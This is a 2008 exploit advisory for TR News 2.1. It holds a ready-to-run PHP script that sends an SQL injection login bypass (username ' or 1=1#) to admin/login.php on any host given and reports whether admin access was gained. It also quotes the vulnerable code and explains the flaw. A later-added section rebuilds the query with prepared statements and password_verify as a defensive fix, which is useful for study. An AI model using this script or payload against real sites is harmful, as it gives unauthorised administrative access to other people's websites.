TR News <= 2.1 (login.php) Remote Login Bypass Exploit
Source: StAkeR[at]hotmail[dot]it  Author: StAkeR  Published: 2008-11-05
<?php

error_reporting(0);

/*
   ------------------------------------------------------
   TR News <= 2.1 (login.php) Remote Login ByPass Exploit
   ------------------------------------------------------
   By StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/trscript-21.zip

   File admin/login.php
  
   1. <?
   2. if(isset($_POST['login_ad']) && ($_POST['password']))
   3.   {
   4. include("../include/connexion.php");
   5. $login=$_POST["login_ad"];
   6. $pass=md5($_POST["password"]);
   7. $sql="SELECT * FROM tr_user_news WHERE pseudo='$login' AND pass='$pass';";
   8. $p = mysql_query($sql);
   9. $row = mysql_fetch_assoc($p);
  10. $admin = $row['admin'];
  11. if($admin != 1)
 
  $login = $_POST["login_ad"]; isn't escaped, so you can insert SQL code...
  How to fix? Sanitize $login with mysql_real_escape_string or htmlentities.
 
 
  NOTE:
 
  if the website is vulnerable,you must go to admin/login.php
 
  Username: ' or 1=1#
  Password: no-deface
 
*/

// '~' delimiters: the original '/http://(.+?)/i' breaks on the unescaped '/' inside the pattern
if(preg_match('~http://(.+?)~i',$argv[1]) or empty($argv[1])) athos();

$host = explode('/',$argv[1]);
$auth = "login_ad=%27+or+1%3D1%23&password=athos";


$data = "POST /$host[1]/admin/login.php HTTP/1.1\r\n".
        "Host: $host[0]\r\n".
        "Connection: close\r\n".   // without this an HTTP/1.1 server keeps the socket open and the feof() loop below never ends
        "Content-Type: application/x-www-form-urlencoded\r\n".
        "Content-Length: ".strlen($auth)."\r\n\r\n".
        "$auth\r\n\r\n";
 
 
if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!\n"); 
if(!fputs($socket,$data)) die("fputs() error!\n");


$content = '';
while(!feof($socket))
{
  $content .= fgets($socket);
} fclose($socket);

if(preg_match("/location: main\.php\?mode=main/i",$content))
{
  exploiting();
  echo "\n[+] Exploit Successfully!\n[+] Site Vulnerable\n";
  exit;
}
else
{
  exploiting();
  echo "\n[+] Exploit Failed!\n[+] Site Not Vulnerable!\n";
  exit;
}
 
function athos()
{
  global $argv;
 
  echo "[+] TR News <= 2.1 (login.php) Remote Login ByPass Exploit\n";
  echo "[+] Usage: php $argv[0] [host/path]\r\n";
  exit;
}
 
function exploiting()
{
  echo "[+] Exploiting";

  for($i=0;$i<=3;$i++)
  {
    echo ".";
    sleep(1);
  }
}
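Added here as an example, not code from the advisory or from TR News: the query from admin/login.php rebuilt with a PDO prepared statement and password_verify(), run against an in-memory SQLite table constructed to match the advisory's table and column names. It assumes PHP with pdo_sqlite; the vulnerable query string is only built and shown, not executed, since the trailing `#` comment is MySQL syntax.

```php
<?php
// Added example (not part of the original advisory or TR News): the vulnerable
// query construction from admin/login.php beside a parameterized version.
// Runs offline against an in-memory SQLite database with constructed sample
// data; table and column names follow the advisory, everything else is assumed.

// Vulnerable pattern: the login value is concatenated into the SQL string, so a
// quote in it changes the query structure. Returned here for inspection only.
function build_vulnerable_query(string $login, string $password): string
{
    $pass = md5($password);
    return "SELECT * FROM tr_user_news WHERE pseudo='$login' AND pass='$pass';";
}

// Hardened pattern: a placeholder keeps the login as data, and the password is
// checked in PHP with password_verify() instead of comparing an unsalted MD5
// inside the query (swapped-in technique, not what TR News ships).
function is_admin_login(PDO $db, string $login, string $password): bool
{
    $stmt = $db->prepare('SELECT pass, admin FROM tr_user_news WHERE pseudo = ?');
    $stmt->execute([$login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['pass'])) {
        return false;
    }
    return (int) $row['admin'] === 1;
}

// Constructed sample table: one admin account.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tr_user_news (pseudo TEXT, pass TEXT, admin INTEGER)');
$ins = $db->prepare('INSERT INTO tr_user_news VALUES (?, ?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT), 1]);

$payload = "' or 1=1#";   // the username from the advisory's NOTE section

echo "Vulnerable query with that username:\n  ",
     build_vulnerable_query($payload, 'no-deface'), "\n";

// The parameterized version treats the payload as a literal username that does
// not exist, while a real credential still logs in.
var_dump(is_admin_login($db, $payload, 'no-deface'));
var_dump(is_admin_login($db, 'admin', 'correct horse'));
```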